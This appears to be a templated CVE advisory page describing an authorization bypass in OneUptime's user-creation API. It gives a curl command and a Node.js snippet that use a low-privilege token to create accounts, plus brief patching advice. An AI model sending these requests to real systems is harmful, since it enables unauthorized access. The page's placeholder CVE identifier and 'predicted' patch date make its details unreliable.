OneUptime, Authorization Bypass, CVE-2025-XXXX (High)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the API endpoint responsible for user creation, typically /api/user. The endpoint fails to properly validate the origin and permissions of the incoming request. Under normal conditions, this endpoint should be accessible only by high-privilege administrators or through the application’s official user interface, which includes necessary security tokens. However, the access control check is missing or insufficient. A low-privilege, authenticated user can bypass the intended UI and send a direct, crafted POST request to this API endpoint. The request contains the necessary JSON payload with details for a new user account (e.g., {"email": "[email protected]", "password": "password"}). The server, failing to verify if the requester has the ‘Admin’ role, processes the request and creates the new user account successfully, leading to unauthorized account proliferation.
Platform: OneUptime
Version: Pre 4.0.0
Vulnerability: Authorization Bypass
Severity: High
date: 2024-11-26

Prediction: Patch by 2024-12-10

What Undercode Say:

curl -X POST https://TARGET/api/user \
-H "Content-Type: application/json" \
-H "Authorization: Bearer LOW_PRIVILEGE_JWT_TOKEN" \
-d '{"email":"[email protected]", "password":"mypassword"}'

// Simple Node.js script to exploit the flaw
const axios = require('axios');
const response = await axios.post('https://TARGET/api/user', {
email: '[email protected]',
password: 'pass123'
}, {
headers: { 'Authorization': `Bearer ${lowPermToken}` }
});

How Exploit:

Craft POST request to user registration API using a low-privilege authenticated session, bypassing the need for administrative rights. The exploit requires only a valid low-level JWT token and knowledge of the API endpoint.

Protection from this CVE

Implement strict role-based access control (RBAC) on the API endpoint. Reject requests that do not originate from an administrative role. Enforce checks using middleware.

Impact:

Unauthorized user account creation, leading to potential system abuse, resource exhaustion, and a compromised user database.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top